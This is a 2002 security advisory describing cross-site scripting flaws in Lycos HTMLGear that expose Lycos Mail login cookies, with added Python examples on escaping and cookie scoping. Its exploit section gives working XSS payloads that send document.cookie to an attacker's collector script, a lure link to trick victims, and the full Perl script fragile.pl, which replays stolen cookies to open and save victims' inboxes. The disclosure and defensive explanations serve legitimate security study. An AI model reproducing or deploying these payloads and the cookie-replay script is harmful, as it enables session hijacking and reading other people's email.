DSINet.org
Lycos XSS/Cookie problems Advisory
by Digiover - 04-11-2002 16:45 - Source:
On 14 September 2002 'Matthew Murphy' reported several bugs in the HTMLGear Guestbook; see [1].

Besides those bugs, HTMLGear also has a cross-site scripting (XSS) flaw in 'control.guest' on the lycos.com server. Both can be used to steal the cookies of users of the site.

The real problem is that this way the Lycos Mail cookies of users can be captured. This works when people use the "Save User Name & Password" option at login and do not log out; closing the browser will not log them out. With the cookie of a Lycos Mail user, anyone can access their mailbox.

----------------------------------------
 Lycos XSS/Cookie problems Advisory
----------------------------------------

Lycos XSS/Cookie problems
04/11/02
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)


-------------------
Vendor Information:
-------------------

Homepage        : http://www.lycos.com
Vendor informed
  About bug      : -
  Mailed advisory: 01/11/02
Vendor Response : None (yet?)
Version on site : control.guest still vulnerable to XSS
                  Cookie capturing still possible

Because they did not answer in the past, I didn't wait
long before making this advisory public.


-------------------
Affected Versions:
-------------------

Tested on:
- Lycos.com Mail 


Not tested on:
- Other Lycos services 


-------------------
Description:
-------------------

What is Lycos?
--------------

- http://login.mail.lycos.com/
    
   - Lycos Mail is a full featured web-based email solution. Lycos Mail
     now offers two levels of email service, a standard FREE version 
     and a NEW Lycos Mail Plus option for the more demanding user. 
    

- http://htmlgear.lycos.com

   - Professional Gears!
     Professional Gears eliminate ALL ads and HTML Gear branding and 
     give you the freedom to integrate Gears more seamlessly on your 
     site. The result is a more professional-looking Gear that's 
     perfect for business and personal sites. Here are just a few of 
     the reasons why you should go pro . . .


-------------------
Vulnerability:
-------------------

On 14 September 2002 'Matthew Murphy' reported several bugs in the
HTMLGear Guestbook, which can be viewed at:
- http://online.securityfocus.com/archive/1/292131
- http://online.securityfocus.com/bid/5728

Besides those bugs, HTMLGear also has a cross-site scripting (XSS)
flaw in 'control.guest' on the lycos.com server. Both bugs can be
used to steal the cookies of users of the site.
The real problem is that this way the Lycos Mail cookies of users
can be captured: the guestbook server lives under the same domain
as the mail system and receives the same cookies, so script injected
into it can read them. This works when people use the "Save User
Name & Password" option at login and do not log out. Closing the
browser will not log them out, because the saved login cookie is
kept across browser sessions.
With the cookie of a Lycos Mail user, anyone can access their
mailbox.


-------------------
Exploit:
-------------------

Inject JavaScript into an unpatched or badly filtered HTMLGear
guestbook. Each payload is one line; 'http://host/cgi-bin/fragile.pl'
is the attacker's collector script, listed below:

- <IMG SRC="javascript:window.open('http://host/cgi-bin/fragile.pl?'%2Bdocument.cookie);">
- <IMG SRC="http://a.a/a" onerror="poof:window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);">
- <IMG SRC="http://ly.lygo.com/ly/0/hp/dog.gif" onload="poof:window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);">

Or have the victim open the following URL, which reflects the 'a'
parameter of control.guest into the page without escaping it, so the
leading '">' closes the attribute and the script tag runs:

- http://htmlgear.lycos.com/guest/control.guest?u=poof&a="><script>window.open('http://host/cgi-bin/fragile.pl?'%2Bdocument.cookie)%3B</script>

For instance by mailing them a link with the payload URL-encoded:

- <a href="http://htmlgear.lycos.com/guest/control.guest?u=poof&a=%22%3E%3Cscript%3Ewindow.open('http://host/cgi-bin/fragile.pl?'%252Bdocument.cookie)%3C/script%3E">Britney Nude!</a>
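The following is an added example, not part of the advisory and not HTMLGear's code. The toy guestbook and control.guest handlers in it are assumptions written for this page; only the three IMG payloads and the layout of the control.guest URL come from the advisory above ('http://host/cgi-bin/fragile.pl' is the advisory's own placeholder for the collector). It shows why the IMG payloads get past a blacklist that only strips <script> tags (the "bad filtered" case), why the reflected 'a' parameter breaks out of its attribute, and what escaping on output does to both:

```python
"""Why the advisory's payloads survive a 'bad filter' and how output
escaping stops them.

Added example for this page; the guestbook and control.guest handlers
are toy stand-ins, not HTMLGear's code. Only the payload shapes and
the control.guest URL layout come from the advisory.
"""
import html
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import parse_qs

# The three guestbook payloads from the advisory, one per line.
PAYLOADS = {
    "javascript-src": (
        "<IMG SRC=\"javascript:window.open("
        "'http://host/cgi-bin/fragile.pl?'%2Bdocument.cookie);\">"
    ),
    "onerror": (
        "<IMG SRC=\"http://a.a/a\" onerror=\"poof:window.open("
        "'http://host/cgi-bin/fragile.pl?'+document.cookie);\">"
    ),
    "onload": (
        "<IMG SRC=\"http://ly.lygo.com/ly/0/hp/dog.gif\" onload=\"poof:"
        "window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);\">"
    ),
}

# The reflected-XSS query string from the advisory's control.guest URL,
# percent-encoded once, the way a browser sends it.
REFLECTED_QUERY = (
    "u=poof&a=%22%3E%3Cscript%3Ewindow.open(%27http://host/cgi-bin/"
    "fragile.pl?%27%2Bdocument.cookie)%3B%3C/script%3E"
)

SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def bad_filter(entry: str) -> str:
    """Blacklist of the kind the advisory calls 'bad filtered' (assumed):
    removes <script> tags and nothing else."""
    return SCRIPT_TAG.sub("", entry)


def good_filter(entry: str) -> str:
    """Escape on output: the entry is shown as text, never parsed as markup."""
    return html.escape(entry, quote=True)


class ActiveContentFinder(HTMLParser):
    """Records what a browser would execute in a rendered fragment:
    <script> elements, on* event handlers and javascript: URLs."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append(name)
            elif name in ("src", "href") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.hits.append(f"{name}=javascript:")


def active_content(rendered: str) -> List[str]:
    """Return the executable pieces a browser would find in `rendered`."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.hits


def render_guestbook(entries, sanitizer) -> str:
    """Render guestbook entries through the given sanitizer (toy handler)."""
    return "\n".join(f"<li>{sanitizer(e)}</li>" for e in entries)


def survivors(sanitizer) -> List[str]:
    """Names of the payloads that still execute after `sanitizer`."""
    return sorted(n for n, p in PAYLOADS.items()
                  if active_content(render_guestbook([p], sanitizer)))


def control_guest_vulnerable(query: str) -> str:
    """Reflects the 'a' parameter into an attribute value unescaped,
    the pattern the advisory's URL exploits (assumed handler)."""
    a = parse_qs(query).get("a", [""])[0]
    return f'<input type="hidden" name="a" value="{a}">'


def control_guest_fixed(query: str) -> str:
    """Same handler with the value escaped for an attribute context."""
    a = parse_qs(query).get("a", [""])[0]
    return f'<input type="hidden" name="a" value="{html.escape(a, quote=True)}">'


if __name__ == "__main__":
    print("survive bad filter   :", survivors(bad_filter))
    print("survive escaping     :", survivors(good_filter))
    print("reflected, vulnerable:", active_content(control_guest_vulnerable(REFLECTED_QUERY)))
    print("reflected, fixed     :", active_content(control_guest_fixed(REFLECTED_QUERY)))
```

All three IMG payloads pass the script-tag blacklist untouched, because none of them contains a script tag: the code sits in an event handler or a javascript: URL. Escaping on output leaves nothing for the parser to execute in either the stored or the reflected case, which is the check a guestbook or a redisplayed form field needs.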


All of these call a Perl script (fragile.pl). The script takes the
cookie, connects to lycos.com and logs in to the mail server with
that cookie, then requests the inbox or the frontpage of the user's
mailbox.
With the third option in the script it only captures the cookies and
writes them to a file together with the email address.
This is just a proof of concept; it could also be changed to read
mail. Please don't email me with requests to write that.

-------------------
Fragile.pl
-------------------

#!/usr/bin/perl -w
#
# Lycos.com XSS/Cookie Problems
# N|ghtHawk
# nighthawk_at_hackers4hackers.org
#
# Runs as a CGI script. The injected JavaScript opens
#   http://host/cgi-bin/fragile.pl?<document.cookie>
# so the victim's cookies arrive in QUERY_STRING. The script replays
# them against the Lycos Mail login server and saves what comes back.

use IO::Socket;

# OPTIONS
# 1. See Mail Frontpage
# 2. See Inbox
# 3. Only save Cookie
$option = 2;

# PATH: directory the captured page (or cookie file) is written to
$path = "/tmp/";

# The victim's cookies as sent by the browser; only spaces arrive
# URL-encoded as %20, so that is all that gets decoded.
$cookie = "$ENV{QUERY_STRING}\;";
$cookie =~ s/%20/ /g;

# Without the MAYA cookie there is no Lycos Mail session to replay.
if ($cookie !~ "MAYA") {
  &no_cookie;
}

# Lycos server addresses at the time of writing.
$ip = "209.202.220.97";
$host = "login.mail.lycos.com";
$req = "\/?callback\=http:\/\/inbox.mail.lycos.com\/jumpPage.shtml";

# Step 1: hit the login server with the stolen cookie. It answers with
# further Set-Cookie headers and a Location pointing into the inbox.
$data = request($ip, $host, $req);

@datar = split(/\n/,$data);
foreach $line (@datar) {
  if ($line =~ /[Cc]ookie: *(.*)\; *.*\;/) {
    # Collect every cookie the server set, for the next request
    $line = $1;
    if ($line !~ "L_LOC") {
      $cookie .= " $line\;";
    } else {
      $cookie .= " $line";
    }
  } elsif ($line =~ /Location: *http\:\/\/inbox.mail.lycos.com(.*)/) {
    # Follow the redirect into inbox.mail.lycos.com by hand
    $req = $1;
  }
}

# Options 1 and 3: fetch the mail frontpage with the combined cookies.
if ($option == 1 || $option == 3) {
  $ip = "209.202.220.100";
  $host = "inbox.mail.lycos.com";
  $data = request($ip, $host, $req);
  out($data);
}

# Option 2: ask for the inbox folder, follow the redirect, fetch it.
if ($option == 2) {
  $ip = "209.202.220.97";
  $host = "login.mail.lycos.com";
  $req = "\/bounce.shtml?goto=folder&folderId=!1inbox&user=&count=1";
  $data = request($ip, $host, $req);
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    if ($line =~ /Location: *http:\/\/(.*com)(\/.*)/) {
      $host = $1;
      $req = $2;
    }
  }
  # The redirect target is connected to by hostname this time
  $data = request($host,$host,$req);
  out($data);
}

# Save the captured page (or only the cookie) under the victim's
# address, then send the victim's browser somewhere harmless.
sub out {
  my ($data) = @_;
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    # The mailbox page greets the user with their address
    if ($line =~ /<b>Hello, * (.+\@lycos.com)<\/b>/) {
      $name = $1;
    }
  }
  if ($option == 3) {
    $data = "$name\n$cookie\n";
    $name = "cookies";
  }
  open(FILE,">$path$name.html");
  print FILE "$data\n";
  close(FILE);

  print "Content-type: text/html\n";
  print "Location: http://www.dwheeler.com/secure-programs".
        "/Secure-Programs-HOWTO.html\n\n";
}

# Minimal HTTP/1.0 GET with the stolen cookie attached; waits two
# seconds, reads whatever arrived (up to 200000 bytes) and returns it.
sub request {
  my ($ip, $host, $req) = @_;
  $sock = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$ip",
  PeerPort => "80",
  Timeout => 30) || die "Could not create socket: $!\n";
  print $sock "GET $req HTTP/1.0\n".
  "Host: $host\n".
  "Accept: image/gif, image/x-xbitmap, */*\n".
  "Accept-Language: nl\n".
  "User-Agent: Pr00fOfConcept/1.0 \n".
  "Connection: Keep-Alive\n".
  "Cookie: $cookie\n\n";
  sleep(2);
  recv($sock,$data,200000,0);
  close($sock);
  return $data;
}

# Reached when the query string carries no MAYA cookie
sub no_cookie {
  print "content-type: text/html\n\n";
  print "<h1>No Lycos Mail Cookie found</h1>\n";
  exit;
}


-------------------
Patch:
-------------------

Well, it's up to Lycos to patch this. It would be a good idea not
to put insecure scripts on a server that uses the same cookies as
your mail system.
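As an added example (not from the advisory, not Lycos code) the minimal cookie jar below models the two facts the Vulnerability and Patch sections rest on: a cookie whose Domain covers every host under lycos.com is sent to, and readable by script on, the guestbook host as well as the mail host; and a cookie set with an Expires attribute, which is what "Save User Name & Password" amounts to, survives closing the browser. The cookie names MAYA and L_LOC are the ones fragile.pl looks for; their values and the Domain, Expires and HttpOnly attributes are assumptions made for this example, since the advisory only says the guestbook server uses the same cookies as the mail system. HttpOnly is not discussed on this page; it is included because it is the flag that keeps a cookie out of document.cookie. Path matching is left out (everything is Path=/):

```python
"""Why a cookie captured on the guestbook host opens the mailbox, and why
closing the browser does not help when the login was saved.

Added example for this page, not Lycos code. It models RFC 6265 domain
matching and session-versus-persistent cookies in a minimal cookie jar.
Cookie values and the Domain/Expires/HttpOnly attributes are assumptions;
path matching is left out.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class Cookie:
    name: str
    value: str
    domain: str        # without leading dot
    host_only: bool    # Set-Cookie carried no Domain attribute
    persistent: bool   # Set-Cookie carried Expires or Max-Age
    http_only: bool    # Set-Cookie carried HttpOnly


def domain_match(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3: host equals the domain or is a subdomain of it."""
    request_host, cookie_domain = request_host.lower(), cookie_domain.lower()
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Parse a Set-Cookie header value as received from request_host."""
    name_value, *attrs = [part.strip() for part in header.split(";")]
    name, _, value = name_value.partition("=")
    cookie = Cookie(name, value, request_host.lower(), True, False, False)
    for attr in attrs:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "domain" and val:
            cookie.domain = val.strip().lstrip(".").lower()
            cookie.host_only = False
        elif key in ("expires", "max-age"):
            cookie.persistent = True
        elif key == "httponly":
            cookie.http_only = True
    return cookie


class CookieJar:
    """Just enough of a browser cookie store for the scenario."""

    def __init__(self) -> None:
        self.cookies: List[Cookie] = []

    def store(self, header: str, request_host: str) -> bool:
        """Accept a Set-Cookie header; reject a Domain the host may not set."""
        cookie = parse_set_cookie(header, request_host)
        if not domain_match(request_host, cookie.domain):
            return False
        self.cookies = [c for c in self.cookies if c.name != cookie.name]
        self.cookies.append(cookie)
        return True

    def _matching(self, host: str) -> List[Cookie]:
        return [c for c in self.cookies
                if (c.host_only and host.lower() == c.domain)
                or (not c.host_only and domain_match(host, c.domain))]

    def for_request(self, host: str) -> str:
        """Cookie header the browser sends to host (HttpOnly included)."""
        return "; ".join(f"{c.name}={c.value}" for c in self._matching(host))

    def document_cookie(self, host: str) -> str:
        """What script running on host sees in document.cookie."""
        return "; ".join(f"{c.name}={c.value}"
                         for c in self._matching(host) if not c.http_only)

    def browser_closed(self) -> None:
        """Session cookies go away; persistent ones survive."""
        self.cookies = [c for c in self.cookies if c.persistent]


def lycos_scenario(save_login: bool, http_only: bool = False) -> CookieJar:
    """Constructed login response: cookie names from the advisory's script,
    values and attributes assumed for the example."""
    jar = CookieJar()
    maya = "MAYA=abc123; Domain=.lycos.com; Path=/"
    if save_login:                      # "Save User Name & Password"
        maya += "; Expires=Thu, 01 Jan 2037 00:00:00 GMT"
    if http_only:
        maya += "; HttpOnly"
    jar.store(maya, "login.mail.lycos.com")
    jar.store("L_LOC=inbox; Domain=.lycos.com; Path=/", "login.mail.lycos.com")
    jar.store("sid=hostonly; Path=/", "login.mail.lycos.com")  # no Domain attr
    return jar


if __name__ == "__main__":
    jar = lycos_scenario(save_login=True)
    print("guestbook host sees :", jar.document_cookie("htmlgear.lycos.com"))
    jar.browser_closed()
    print("after browser close :", jar.document_cookie("htmlgear.lycos.com"))
```

Script on htmlgear.lycos.com sees MAYA and L_LOC because both were set for the whole lycos.com domain, while the host-only cookie set on login.mail.lycos.com never reaches the guestbook host; that is the scoping the Patch section asks for. After the browser is closed only the cookie with an Expires attribute remains, so a saved login stays replayable until it expires or the user logs out.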


-------------------
Thanks:
-------------------

Wim, Digiover, Asby

-------------------
1. http://online.securityfocus.com/archive/1/292131 and http://online.securityfocus.com/bid/5728.